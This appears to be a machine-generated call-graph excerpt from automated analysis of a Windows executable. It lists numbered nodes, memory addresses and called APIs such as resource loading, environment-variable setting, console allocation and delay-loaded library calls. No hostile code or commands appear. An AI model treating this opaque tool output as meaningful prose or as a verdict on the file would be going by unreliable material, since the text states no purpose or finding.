7ff75fbc036c 21850->21868 21852->21845 21854 7ff75fbbda18 __free_lconv_mon 15 API calls 21854->21852 21855 7ff75fbbfd20 21857 7ff75fbbda58 _snwprintf 16 API calls 21855->21857 21859 7ff75fbbfd4b _snwprintf 21855->21859 21856 7ff75fbbfcce 21858 7ff75fbc036c _snwprintf 6 API calls 21856->21858 21856->21861 21857->21859 21858->21861 21860 7ff75fbc036c _snwprintf 6 API calls 21859->21860 21859->21861 21862 7ff75fbbfdde 21860->21862 21861->21852 21861->21854 21863 7ff75fbbfe14 21862->21863 21864 7ff75fbbfe08 WideCharToMultiByte 21862->21864 21863->21861 21865 7ff75fbbda18 __free_lconv_mon 15 API calls 21863->21865 21864->21863 21866 7ff75fbbfe74 21864->21866 21865->21861 21866->21861 21867 7ff75fbbda18 __free_lconv_mon 15 API calls 21866->21867 21867->21861 21869 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21868->21869 21870 7ff75fbc03af 21869->21870 21872 7ff75fbbfcb8 21870->21872 21874 7ff75fbc045c 21870->21874 21872->21855 21872->21856 21872->21861 21873 7ff75fbc0418 LCMapStringW 21873->21872 21875 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21874->21875 21876 7ff75fbc048f _snwprintf 21875->21876 21876->21873 21879 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21878->21879 21880 7ff75fbc032f 21879->21880 21881 7ff75fbc034c InitializeCriticalSectionAndSpinCount 21880->21881 21882 7ff75fbc0337 21880->21882 21881->21882 21882->21748 21884 7ff75fbbffbb 21883->21884 21885 7ff75fbbffbf 21884->21885 21886 7ff75fbbff9e DeleteCriticalSection 21884->21886 21885->21751 21886->21884 21888 7ff75fbb5f13 21887->21888 21890 7ff75fbb5d85 21887->21890 21891 7ff75fbb8074 21888->21891 21890->21724 21892 7ff75fbb7edc __vcrt_InitializeCriticalSectionEx 5 API calls 21891->21892 21893 7ff75fbb809b TlsFree 21892->21893 21900 7ff75fb95fb8 21895->21900 21901 7ff75fb9c4d4 2 API calls 21900->21901 21902 7ff75fb95fca 21901->21902 21909 7ff75fb96214 21902->21909 21910 7ff75fb9c5b8 2 API calls 21909->21910 21911 7ff75fb96222 21910->21911 21924 7ff75fbb435f GetStartupInfoW 21923->21924 
21924->21617 21926 7ff75fbc1690 21925->21926 21927 7ff75fbb8818 swprintf 35 API calls 21926->21927 21928 7ff75fbc16b4 21927->21928 21928->21644 21930 7ff75fbb3900 _snwprintf 21929->21930 21931 7ff75fba239c GetModuleHandleW 21930->21931 21932 7ff75fba2412 21931->21932 21933 7ff75fba23bd GetProcAddress 21931->21933 21936 7ff75fba27f8 GetModuleFileNameW 21932->21936 22033 7ff75fbbc0b0 21932->22033 21934 7ff75fba23d2 21933->21934 21935 7ff75fba23ea GetProcAddress 21933->21935 21934->21935 21935->21932 21937 7ff75fba23ff 21935->21937 21952 7ff75fba2816 21936->21952 21937->21932 21940 7ff75fba271c GetModuleFileNameW CreateFileW 21941 7ff75fba27ef CloseHandle 21940->21941 21942 7ff75fba2766 SetFilePointer 21940->21942 21941->21936 21942->21941 21943 7ff75fba277b ReadFile 21942->21943 21943->21941 21946 7ff75fba27a1 21943->21946 21944 7ff75fb9c108 GetVersionExW 21944->21952 21945 7ff75fba2320 2 API calls 21945->21952 21947 7ff75fba27e8 21946->21947 21950 7ff75fba2320 2 API calls 21946->21950 21947->21941 21948 7ff75fba288a GetFileAttributesW 21951 7ff75fba28ae 21948->21951 21948->21952 21949 7ff75fba284c CompareStringW 21949->21952 21950->21946 21954 7ff75fba28b8 21951->21954 21955 7ff75fba28f9 21951->21955 21952->21944 21952->21945 21952->21948 21952->21949 21952->21951 21953 7ff75fba2a2f 21978 7ff75fbae27c GetCurrentDirectoryW 21953->21978 21956 7ff75fba28d7 GetFileAttributesW 21954->21956 21957 7ff75fba28f4 21954->21957 21955->21953 21958 7ff75fb9c108 GetVersionExW 21955->21958 21956->21954 21956->21957 21957->21955 21959 7ff75fba2913 21958->21959 21960 7ff75fba2991 21959->21960 21961 7ff75fba291a 21959->21961 21962 7ff75fb945d8 swprintf 46 API calls 21960->21962 21963 7ff75fba2320 2 API calls 21961->21963 21964 7ff75fba29c4 AllocConsole 21962->21964 21965 7ff75fba2926 21963->21965 21967 7ff75fba2a26 ExitProcess 21964->21967 21968 7ff75fba29ce GetCurrentProcessId AttachConsole 21964->21968 21966 7ff75fba2320 2 API calls 21965->21966 21969 7ff75fba2932 21966->21969 22037 
7ff75fbb82c8 21968->22037 21971 7ff75fb9fdf8 48 API calls 21969->21971 21973 7ff75fba293c 21971->21973 21974 7ff75fb945d8 swprintf 46 API calls 21973->21974 21975 7ff75fba296b 21974->21975 21976 7ff75fb9fdf8 48 API calls 21975->21976 21977 7ff75fba2975 21976->21977 21977->21967 21978->21651 21980 7ff75fba2320 2 API calls 21979->21980 21981 7ff75fbae945 OleInitialize 21980->21981 21982 7ff75fbae96b 21981->21982 21983 7ff75fbae991 SHGetMalloc 21982->21983 21983->21653 21985 7ff75fbaf5f2 21984->21985 21986 7ff75fbaf5fd 21984->21986 22039 7ff75fbae32c FindResourceW 21985->22039 21988 7ff75fbaf602 GetObjectW 21986->21988 21989 7ff75fbaf617 21986->21989 21988->21989 21991 7ff75fbae1dc 4 API calls 21989->21991 21992 7ff75fbaf62c 21991->21992 21993 7ff75fbaf682 21992->21993 21994 7ff75fbaf652 21992->21994 21995 7ff75fbaf634 21992->21995 22005 7ff75fb9efc8 21993->22005 21996 7ff75fbae244 4 API calls 21994->21996 21997 7ff75fbae32c 10 API calls 21995->21997 21998 7ff75fbaf65b 21996->21998 21999 7ff75fbaf63e 21997->21999 22000 7ff75fbae20c 4 API calls 21998->22000 21999->21994 22001 7ff75fbaf646 DeleteObject 21999->22001 22002 7ff75fbaf666 22000->22002 22001->21994 22003 7ff75fbae4cc 8 API calls 22002->22003 22004 7ff75fbaf673 DeleteObject 22003->22004 22004->21993 22053 7ff75fb9eff8 22005->22053 22007 7ff75fb9efd6 22101 7ff75fb9f9a4 GetModuleHandleW FindResourceW 22007->22101 22009 7ff75fb9efde 22009->21671 22011 7ff75fbb38a0 4 API calls 22010->22011 22012 7ff75fbaca0d 22011->22012 22012->21675 22014 7ff75fbae9c5 22013->22014 22015 7ff75fbae9ce OleUninitialize 22014->22015 22016 7ff75fc012f8 22015->22016 22019 7ff75fbb0769 _snwprintf 22017->22019 22018 7ff75fbb086f 22018->21662 22018->21663 22019->22018 22020 7ff75fba0d18 80 API calls 22019->22020 22020->22019 22022 7ff75fbb3900 _snwprintf 22021->22022 22023 7ff75fbb2130 SetEnvironmentVariableW 22022->22023 22025 7ff75fbb2159 22023->22025 22024 7ff75fbb2186 22024->21670 22025->22024 22026 7ff75fbb2176 SetEnvironmentVariableW 
22025->22026 22026->22024 22028 7ff75fbaeb58 _snwprintf 22027->22028 22029 7ff75fba3da0 CompareStringW 22028->22029 22032 7ff75fbaeb99 memcpy_s 22028->22032 22030 7ff75fbaeb89 22029->22030 22030->22032 22141 7ff75fbae91c SetCurrentDirectoryW 22030->22141 22032->21683 22034 7ff75fbbc0c4 swprintf 22033->22034 22035 7ff75fbbb6c8 _snwprintf 39 API calls 22034->22035 22036 7ff75fba2712 22035->22036 22036->21936 22036->21940 22038 7ff75fba29e8 GetStdHandle WriteConsoleW Sleep FreeConsole 22037->22038 22038->21967 22040 7ff75fbae357 SizeofResource 22039->22040 22042 7ff75fbae4a3 22039->22042 22041 7ff75fbae371 LoadResource 22040->22041 22040->22042 22041->22042 22043 7ff75fbae38a LockResource 22041->22043 22042->21986 22043->22042 22044 7ff75fbae39f GlobalAlloc 22043->22044 22044->22042 22045 7ff75fbae3c0 GlobalLock 22044->22045 22046 7ff75fbae49a GlobalFree 22045->22046 22047 7ff75fbae3d2 memcpy_s 22045->22047 22046->22042 22048 7ff75fbae491 GlobalUnlock 22047->22048 22049 7ff75fbae3fe GdipAlloc 22047->22049 22048->22046 22050 7ff75fbae413 22049->22050 22050->22048 22051 7ff75fbae462 GdipCreateHBITMAPFromBitmap 22050->22051 22052 7ff75fbae47a 22050->22052 22051->22052 22052->22048 22054 7ff75fb9f01a _snwprintf 22053->22054 22055 7ff75fb9f037 GetModuleFileNameW 22054->22055 22056 7ff75fb9f072 22054->22056 22057 7ff75fb9f058 22055->22057 22058 7ff75fb9a990 6 API calls 22056->22058 22057->22056 22065 7ff75fb9f0ad 22058->22065 22059 7ff75fb9a5b0 77 API calls 22062 7ff75fb9f911 22059->22062 22060 7ff75fb9f0e7 22103 7ff75fbbad50 22060->22103 22062->22007 22063 7ff75fb9f970 75 API calls 22063->22065 22065->22060 22065->22063 22077 7ff75fb9f333 22065->22077 22066 7ff75fbbad50 31 API calls 22074 7ff75fb9f118 __vcrt_InitializeCriticalSectionEx 22066->22074 22067 7ff75fb9f25b 22068 7ff75fb9ae50 79 API calls 22067->22068 22067->22077 22071 7ff75fb9f276 22068->22071 22069 7ff75fb9af60 77 API calls 22069->22074 22070 7ff75fb9ac90 80 API calls 22070->22074 22073 7ff75fb9ac90 80 API 
calls 22071->22073 22071->22077 22072 7ff75fb9ae50 79 API calls 22072->22074 22075 7ff75fb9f2a1 22073->22075 22074->22067 22074->22069 22074->22070 22074->22072 22074->22077 22076 7ff75fba3910 MultiByteToWideChar 22075->22076 22075->22077 22098 7ff75fb9f2b1 __vcrt_InitializeCriticalSectionEx 22075->22098 22076->22098 22077->22059 22078 7ff75fbbd8e0 31 API calls 22082 7ff75fb9f7f8 22078->22082 22079 7ff75fb9f714 22080 7ff75fb9f472 22079->22080 22111 7ff75fbbd8e0 22079->22111 22080->22078 22089 7ff75fb9f882 22080->22089 22081 7ff75fbbc0dc 31 API calls 22085 7ff75fb9f85a 22081->22085 22082->22081 22083 7ff75fb9f708 22083->22007 22088 7ff75fb9f92c 75 API calls 22085->22088 22086 7ff75fb9f8c2 22087 7ff75fbbad50 31 API calls 22086->22087 22090 7ff75fb9f8eb 22087->22090 22088->22089 22089->22086 22091 7ff75fb9f970 75 API calls 22089->22091 22092 7ff75fbbad50 31 API calls 22090->22092 22091->22089 22092->22077 22093 7ff75fbbc0dc 31 API calls 22095 7ff75fb9f793 22093->22095 22118 7ff75fb9f92c 22095->22118 22097 7ff75fba3b98 WideCharToMultiByte 22097->22098 22098->22077 22098->22079 22098->22080 22098->22083 22098->22097 22099 7ff75fbbab74 31 API calls 22098->22099 22100 7ff75fb9fda0 _snwprintf 45 API calls 22098->22100 22099->22098 22100->22098 22102 7ff75fb9f9d0 22101->22102 22102->22009 22104 7ff75fbbad7d 22103->22104 22105 7ff75fbbdedc memcpy_s 15 API calls 22104->22105 22110 7ff75fbbad92 22104->22110 22106 7ff75fbbad87 22105->22106 22107 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 22106->22107 22107->22110 22108 7ff75fbc6b90 _handle_error 8 API calls 22109 7ff75fb9f102 22108->22109 22109->22066 22110->22108 22112 7ff75fbbd909 22111->22112 22115 7ff75fb9f72a 22111->22115 22112->22115 22121 7ff75fbbd9b0 22112->22121 22115->22093 22116 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 22117 7ff75fbbd954 22116->22117 22130 7ff75fb9e888 22118->22130 22120 7ff75fb9f946 22120->22080 22122 7ff75fbbd9c7 22121->22122 22123 7ff75fbbd9bd 22121->22123 22124 7ff75fbbdedc 
memcpy_s 15 API calls 22122->22124 22123->22122 22126 7ff75fbbd9e2 22123->22126 22125 7ff75fbbd9ce 22124->22125 22127 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 22125->22127 22128 7ff75fbbd936 22126->22128 22129 7ff75fbbdedc memcpy_s 15 API calls 22126->22129 22127->22128 22128->22115 22128->22116 22129->22125 22131 7ff75fb9e8af 22130->22131 22140 7ff75fb9e923 memcpy_s 22130->22140 22132 7ff75fb9e8dc 22131->22132 22133 7ff75fb97660 73 API calls 22131->22133 22134 7ff75fb9e95d 22132->22134 22135 7ff75fb9e907 22132->22135 22136 7ff75fb9e8d0 22133->22136 22138 7ff75fb97720 73 API calls 22134->22138 22134->22140 22139 7ff75fb97720 73 API calls 22135->22139 22135->22140 22137 7ff75fb97720 73 API calls 22136->22137 22137->22132 22138->22140 22139->22140 22140->22120 22141->22032 18791 7ff75fbb2da1 18792 7ff75fbb2cd4 18791->18792 18792->18791 18794 7ff75fbb3490 18792->18794 18820 7ff75fbb30e4 18794->18820 18797 7ff75fbb351b 18798 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18797->18798 18799 7ff75fbb3528 RaiseException 18798->18799 18815 7ff75fbb3745 18799->18815 18800 7ff75fbb364d 18806 7ff75fbb36ab GetProcAddress 18800->18806 18807 7ff75fbb3715 18800->18807 18801 7ff75fbb35cd LoadLibraryExA 18802 7ff75fbb35e4 GetLastError 18801->18802 18803 7ff75fbb3639 18801->18803 18808 7ff75fbb35f9 18802->18808 18809 7ff75fbb360e 18802->18809 18803->18800 18804 7ff75fbb3644 FreeLibrary 18803->18804 18804->18800 18805 7ff75fbb3544 18805->18800 18805->18801 18805->18803 18805->18807 18806->18807 18810 7ff75fbb36c0 GetLastError 18806->18810 18828 7ff75fbb33f4 18807->18828 18808->18803 18808->18809 18812 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18809->18812 18814 7ff75fbb36d5 18810->18814 18813 7ff75fbb361b RaiseException 18812->18813 18813->18815 18814->18807 18816 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18814->18816 18815->18792 18817 7ff75fbb36f7 RaiseException 18816->18817 18818 7ff75fbb30e4 6 API calls 18817->18818 18819 
7ff75fbb3711 18818->18819 18819->18807 18821 7ff75fbb30fa 18820->18821 18827 7ff75fbb315f 18820->18827 18836 7ff75fbb3190 18821->18836 18824 7ff75fbb315a 18826 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18824->18826 18826->18827 18827->18797 18827->18805 18829 7ff75fbb345d 18828->18829 18830 7ff75fbb3404 18828->18830 18829->18815 18831 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18830->18831 18832 7ff75fbb3409 18831->18832 18833 7ff75fbb3458 18832->18833 18834 7ff75fbb3364 DloadProtectSection 3 API calls 18832->18834 18835 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18833->18835 18834->18833 18835->18829 18837 7ff75fbb30ff 18836->18837 18838 7ff75fbb31ab 18836->18838 18837->18824 18843 7ff75fbb3364 18837->18843 18838->18837 18839 7ff75fbb31b0 GetModuleHandleW 18838->18839 18840 7ff75fbb31c5 18839->18840 18841 7ff75fbb31ca GetProcAddress 18839->18841 18840->18837 18841->18840 18842 7ff75fbb31df GetProcAddress 18841->18842 18842->18840 18844 7ff75fbb3386 DloadObtainSection 18843->18844 18845 7ff75fbb33c6 VirtualProtect 18844->18845 18846 7ff75fbb338e 18844->18846 18848 7ff75fbb3230 VirtualQuery 18844->18848 18845->18846 18846->18824 18849 7ff75fbb3259 18848->18849 18850 7ff75fbb3265 GetSystemInfo 18849->18850 18851 7ff75fbb32a9 18849->18851 18850->18851 18851->18845 19056 7ff75fbb25b0 19057 7ff75fbb25bc _snwprintf 19056->19057 19064 7ff75fb9fdf8 19057->19064 19065 7ff75fb9fe0b 19064->19065 19080 7ff75fb9eec4 19065->19080 19068 7ff75fb9fe70 LoadStringW 19069 7ff75fb9fe9e 19068->19069 19070 7ff75fb9fe89 LoadStringW 19068->19070 19071 7ff75fb945d8 19069->19071 19070->19069 19072 7ff75fb945fd _snwprintf 19071->19072 19521 7ff75fbba818 19072->19521 19075 7ff75fbaf3c8 PeekMessageW 19076 7ff75fbaf3e8 GetMessageW 19075->19076 19077 7ff75fbaf42c 19075->19077 19078 7ff75fbaf416 TranslateMessage DispatchMessageW 19076->19078 19079 7ff75fbaf407 IsDialogMessageW 19076->19079 19078->19077 19079->19077 19079->19078 19085 7ff75fb9edc0 
19080->19085 19082 7ff75fb9ef05 19083 7ff75fb9ef1c 19082->19083 19093 7ff75fb9ef3c 19082->19093 19083->19068 19083->19069 19086 7ff75fb9ede4 19085->19086 19092 7ff75fb9ee7d 19085->19092 19088 7ff75fb9ee10 19086->19088 19097 7ff75fba3b98 WideCharToMultiByte 19086->19097 19091 7ff75fb9ee43 19088->19091 19099 7ff75fb9fda0 19088->19099 19103 7ff75fbbab74 19091->19103 19092->19082 19094 7ff75fb9ef5e 19093->19094 19096 7ff75fb9ef86 19093->19096 19095 7ff75fbbab74 31 API calls 19094->19095 19095->19096 19096->19083 19098 7ff75fba3bda 19097->19098 19098->19088 19100 7ff75fb9fdc5 _snwprintf 19099->19100 19109 7ff75fbba5e4 19100->19109 19104 7ff75fbbaba4 19103->19104 19105 7ff75fbbdedc memcpy_s 15 API calls 19104->19105 19108 7ff75fbbabb9 19104->19108 19106 7ff75fbbabae 19105->19106 19107 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19106->19107 19107->19108 19108->19092 19110 7ff75fbba642 19109->19110 19111 7ff75fbba62a 19109->19111 19110->19111 19112 7ff75fbba64c 19110->19112 19113 7ff75fbbdedc memcpy_s 15 API calls 19111->19113 19136 7ff75fbb8818 19112->19136 19115 7ff75fbba62f 19113->19115 19116 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19115->19116 19135 7ff75fbba63a 19116->19135 19117 7ff75fbc6b90 _handle_error 8 API calls 19119 7ff75fb9fde5 19117->19119 19118 7ff75fbba65d memcpy_s 19144 7ff75fbb871c 19118->19144 19119->19091 19124 7ff75fbba6d9 19126 7ff75fbbda18 __free_lconv_mon 15 API calls 19124->19126 19125 7ff75fbba708 19127 7ff75fbba784 19125->19127 19130 7ff75fbba70e 19125->19130 19132 7ff75fbba760 19125->19132 19134 7ff75fbba717 19125->19134 19126->19135 19128 7ff75fbba78e 19127->19128 19127->19132 19133 7ff75fbbda18 __free_lconv_mon 15 API calls 19128->19133 19129 7ff75fbbda18 __free_lconv_mon 15 API calls 19129->19135 19130->19132 19130->19134 19131 7ff75fbbda18 __free_lconv_mon 15 API calls 19131->19135 19132->19131 19133->19135 19134->19129 19135->19117 19137 7ff75fbb8833 19136->19137 19143 7ff75fbb882e 19136->19143 19138 7ff75fbbe5c0 abort 
35 API calls 19137->19138 19137->19143 19139 7ff75fbb8850 19138->19139 19163 7ff75fbbe764 19139->19163 19143->19118 19145 7ff75fbbdedc memcpy_s 15 API calls 19144->19145 19146 7ff75fbb878b 19145->19146 19147 7ff75fbb8a1c 19146->19147 19148 7ff75fbb8a50 19147->19148 19149 7ff75fbb8a38 19147->19149 19148->19149 19160 7ff75fbb8a57 19148->19160 19150 7ff75fbbdedc memcpy_s 15 API calls 19149->19150 19151 7ff75fbb8a3d 19150->19151 19152 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19151->19152 19158 7ff75fbb8a48 19152->19158 19153 7ff75fbb8c0a 19154 7ff75fbbdedc memcpy_s 15 API calls 19153->19154 19156 7ff75fbb8c0f 19154->19156 19157 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19156->19157 19157->19158 19158->19124 19158->19125 19160->19153 19160->19158 19195 7ff75fbb92c8 19160->19195 19211 7ff75fbb8fa8 19160->19211 19233 7ff75fbb8918 19160->19233 19236 7ff75fbb8e9c 19160->19236 19164 7ff75fbb8874 19163->19164 19165 7ff75fbbe779 19163->19165 19167 7ff75fbbe798 19164->19167 19165->19164 19171 7ff75fbc2810 19165->19171 19168 7ff75fbbe7c0 19167->19168 19169 7ff75fbbe7ad 19167->19169 19168->19143 19169->19168 19183 7ff75fbc1328 19169->19183 19172 7ff75fbbe5c0 abort 35 API calls 19171->19172 19173 7ff75fbc281f 19172->19173 19174 7ff75fbc2871 19173->19174 19182 7ff75fbbff68 EnterCriticalSection 19173->19182 19174->19164 19184 7ff75fbbe5c0 abort 35 API calls 19183->19184 19185 7ff75fbc1337 19184->19185 19186 7ff75fbc1352 19185->19186 19194 7ff75fbbff68 EnterCriticalSection 19185->19194 19188 7ff75fbc13d8 19186->19188 19191 7ff75fbbd958 abort 35 API calls 19186->19191 19188->19168 19191->19188 19196 7ff75fbb934f 19195->19196 19206 7ff75fbb92f2 19195->19206 19197 7ff75fbb9354 19196->19197 19198 7ff75fbb93d3 19196->19198 19200 7ff75fbb93b9 19197->19200 19201 7ff75fbb935e 19197->19201 19259 7ff75fbb9910 19198->19259 19247 7ff75fbba06c 19200->19247 19202 7ff75fbb93dc _snwprintf 19201->19202 19209 7ff75fbb9340 _snwprintf 19201->19209 19253 7ff75fbb9ecc 19201->19253 
19202->19160 19206->19198 19206->19201 19206->19202 19207 7ff75fbb9322 19206->19207 19208 7ff75fbb9330 19206->19208 19206->19209 19207->19198 19207->19208 19207->19209 19208->19202 19243 7ff75fbb9d70 19208->19243 19209->19202 19267 7ff75fbba2a0 19209->19267 19212 7ff75fbb8fb3 19211->19212 19213 7ff75fbb8fcc 19211->19213 19215 7ff75fbb934f 19212->19215 19216 7ff75fbb8ff0 19212->19216 19228 7ff75fbb92f2 19212->19228 19214 7ff75fbbdedc memcpy_s 15 API calls 19213->19214 19213->19216 19217 7ff75fbb8fe5 19214->19217 19218 7ff75fbb9354 19215->19218 19219 7ff75fbb93d3 19215->19219 19216->19160 19221 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19217->19221 19223 7ff75fbb93b9 19218->19223 19224 7ff75fbb935e 19218->19224 19220 7ff75fbb9910 _snwprintf 43 API calls 19219->19220 19230 7ff75fbb9340 _snwprintf 19220->19230 19221->19216 19222 7ff75fbb9330 19225 7ff75fbb9d70 _snwprintf 37 API calls 19222->19225 19232 7ff75fbb93dc _snwprintf 19222->19232 19226 7ff75fbba06c swprintf 31 API calls 19223->19226 19227 7ff75fbb9ecc swprintf 31 API calls 19224->19227 19224->19230 19224->19232 19225->19230 19226->19230 19227->19230 19228->19219 19228->19222 19228->19224 19229 7ff75fbb9322 19228->19229 19228->19230 19228->19232 19229->19219 19229->19222 19229->19230 19231 7ff75fbba2a0 _snwprintf 37 API calls 19230->19231 19230->19232 19231->19232 19232->19160 19481 7ff75fbbdefc 19233->19481 19515 7ff75fbb8f10 19236->19515 19239 7ff75fbbdedc memcpy_s 15 API calls 19240 7ff75fbb8efd 19239->19240 19241 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19240->19241 19242 7ff75fbb8eb0 19241->19242 19242->19160 19245 7ff75fbb9d8c _snwprintf 19243->19245 19244 7ff75fbb9dd5 19244->19209 19245->19244 19273 7ff75fbbe230 19245->19273 19252 7ff75fbba094 swprintf 19247->19252 19248 7ff75fbbdedc memcpy_s 15 API calls 19249 7ff75fbba09d 19248->19249 19250 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19249->19250 19251 7ff75fbba0a8 19250->19251 19251->19209 19252->19248 19252->19251 19254 
7ff75fbb9eed 19253->19254 19255 7ff75fbbdedc memcpy_s 15 API calls 19254->19255 19258 7ff75fbb9f38 swprintf 19254->19258 19256 7ff75fbb9f2d 19255->19256 19257 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19256->19257 19257->19258 19258->19209 19260 7ff75fbb9928 19259->19260 19295 7ff75fbb83f8 19260->19295 19266 7ff75fbb9a63 19266->19209 19271 7ff75fbba32d _snwprintf 19267->19271 19272 7ff75fbba2c7 _snwprintf 19267->19272 19268 7ff75fbbe230 _snwprintf 37 API calls 19268->19272 19269 7ff75fbc6b90 _handle_error 8 API calls 19270 7ff75fbba365 19269->19270 19270->19202 19271->19269 19272->19268 19272->19271 19276 7ff75fbbe0ac 19273->19276 19277 7ff75fbbe0cf 19276->19277 19278 7ff75fbbe0d4 19277->19278 19279 7ff75fbbe106 19277->19279 19280 7ff75fbbe0f3 19277->19280 19278->19244 19281 7ff75fbb8818 swprintf 35 API calls 19279->19281 19282 7ff75fbbdedc memcpy_s 15 API calls 19280->19282 19283 7ff75fbbe118 19281->19283 19284 7ff75fbbe0f8 19282->19284 19285 7ff75fbbe1a0 WideCharToMultiByte 19283->19285 19286 7ff75fbbe127 19283->19286 19287 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19284->19287 19289 7ff75fbbe1f4 GetLastError 19285->19289 19290 7ff75fbbe139 memcpy_s 19285->19290 19288 7ff75fbbe183 memcpy_s 19286->19288 19286->19290 19287->19278 19288->19278 19292 7ff75fbbdedc memcpy_s 15 API calls 19288->19292 19289->19288 19289->19290 19290->19278 19291 7ff75fbbdedc memcpy_s 15 API calls 19290->19291 19291->19278 19293 7ff75fbbe21f 19292->19293 19294 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19293->19294 19294->19278 19296 7ff75fbb8425 19295->19296 19297 7ff75fbb8434 19295->19297 19298 7ff75fbbdedc memcpy_s 15 API calls 19296->19298 19299 7ff75fbb842a 19297->19299 19337 7ff75fbbda58 19297->19337 19298->19299 19305 7ff75fbbf204 19299->19305 19302 7ff75fbb8474 19304 7ff75fbbda18 __free_lconv_mon 15 API calls 19302->19304 19303 7ff75fbbda18 __free_lconv_mon 15 API calls 19303->19302 19304->19299 19306 7ff75fbbf231 19305->19306 19308 7ff75fbbf249 
19305->19308 19307 7ff75fbbdedc memcpy_s 15 API calls 19306->19307 19309 7ff75fbbf236 19307->19309 19308->19306 19312 7ff75fbbf260 _snwprintf 19308->19312 19310 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19309->19310 19311 7ff75fbb9a46 19310->19311 19311->19266 19330 7ff75fbb88a8 19311->19330 19316 7ff75fbbf2b4 19312->19316 19319 7ff75fbbf293 19312->19319 19313 7ff75fbbf3f0 19313->19311 19461 7ff75fbbe834 19313->19461 19314 7ff75fbbf3b7 19454 7ff75fbbeb94 19314->19454 19316->19313 19316->19314 19317 7ff75fbbf32d 19316->19317 19320 7ff75fbbf2f1 19316->19320 19323 7ff75fbbf2e3 19316->19323 19387 7ff75fbc2e80 19317->19387 19344 7ff75fbbf0c0 19319->19344 19377 7ff75fbbef88 19320->19377 19323->19314 19326 7ff75fbbf2ec 19323->19326 19326->19317 19326->19320 19328 7ff75fbbf384 19328->19311 19451 7ff75fbbee40 19328->19451 19471 7ff75fbbc4ac 19330->19471 19332 7ff75fbb88c0 19333 7ff75fbb88d4 19332->19333 19475 7ff75fbbddb0 19332->19475 19335 7ff75fbbc4ac _snwprintf 43 API calls 19333->19335 19336 7ff75fbb88dc 19335->19336 19336->19266 19338 7ff75fbbdaa3 19337->19338 19342 7ff75fbbda67 abort 19337->19342 19339 7ff75fbbdedc memcpy_s 15 API calls 19338->19339 19341 7ff75fbb8460 19339->19341 19340 7ff75fbbda8a RtlAllocateHeap 19340->19341 19340->19342 19341->19302 19341->19303 19342->19338 19342->19340 19343 7ff75fbbc50c abort EnterCriticalSection LeaveCriticalSection 19342->19343 19343->19342 19345 7ff75fbbf0ee 19344->19345 19348 7ff75fbbf10c 19344->19348 19346 7ff75fbc6b90 _handle_error 8 API calls 19345->19346 19347 7ff75fbbf103 19346->19347 19347->19311 19349 7ff75fbbd9b0 __std_exception_copy 31 API calls 19348->19349 19350 7ff75fbbf1e4 19349->19350 19350->19345 19351 7ff75fbbf1ec 19350->19351 19352 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19351->19352 19354 7ff75fbbf201 19352->19354 19353 7ff75fbbf231 19355 7ff75fbbdedc memcpy_s 15 API calls 19353->19355 19354->19353 19357 7ff75fbbf260 _snwprintf 19354->19357 19356 7ff75fbbf236 19355->19356 19358 
7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19356->19358 19364 7ff75fbbf293 19357->19364 19366 7ff75fbbf2b4 19357->19366 19367 7ff75fbbf242 19358->19367 19359 7ff75fbbf3f0 19361 7ff75fbbe834 _snwprintf 35 API calls 19359->19361 19359->19367 19360 7ff75fbbf3b7 19363 7ff75fbbeb94 _snwprintf 35 API calls 19360->19363 19361->19367 19362 7ff75fbbf32d 19368 7ff75fbc2e80 _snwprintf 31 API calls 19362->19368 19363->19367 19369 7ff75fbbf0c0 _snwprintf 35 API calls 19364->19369 19365 7ff75fbbf2f1 19371 7ff75fbbef88 _snwprintf 35 API calls 19365->19371 19366->19359 19366->19360 19366->19362 19366->19365 19370 7ff75fbbf2e3 19366->19370 19367->19311 19372 7ff75fbbf357 19368->19372 19369->19367 19370->19360 19373 7ff75fbbf2ec 19370->19373 19371->19367 19374 7ff75fbc28e8 _snwprintf 31 API calls 19372->19374 19373->19362 19373->19365 19375 7ff75fbbf384 19374->19375 19375->19367 19376 7ff75fbbee40 _snwprintf 35 API calls 19375->19376 19376->19367 19378 7ff75fbc2e80 _snwprintf 31 API calls 19377->19378 19379 7ff75fbbefcc 19378->19379 19380 7ff75fbc28e8 _snwprintf 31 API calls 19379->19380 19381 7ff75fbbf005 19380->19381 19382 7ff75fbbf067 19381->19382 19383 7ff75fbbf02b 19381->19383 19386 7ff75fbbf009 19381->19386 19384 7ff75fbbec64 _snwprintf 35 API calls 19382->19384 19385 7ff75fbbee40 _snwprintf 35 API calls 19383->19385 19384->19386 19385->19386 19386->19311 19388 7ff75fbc2ece fegetenv _snwprintf 19387->19388 19389 7ff75fbc2f3b 19388->19389 19392 7ff75fbc2f62 _snwprintf 19388->19392 19390 7ff75fbbd9b0 __std_exception_copy 31 API calls 19389->19390 19391 7ff75fbc2f55 19390->19391 19393 7ff75fbc40ce _snwprintf 19391->19393 19394 7ff75fbc2f5d 19391->19394 19395 7ff75fbc2f81 19392->19395 19396 7ff75fbc4130 19392->19396 19403 7ff75fbc6b90 _handle_error 8 API calls 19393->19403 19400 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19394->19400 19398 7ff75fbc4111 19395->19398 19399 7ff75fbc2f8a 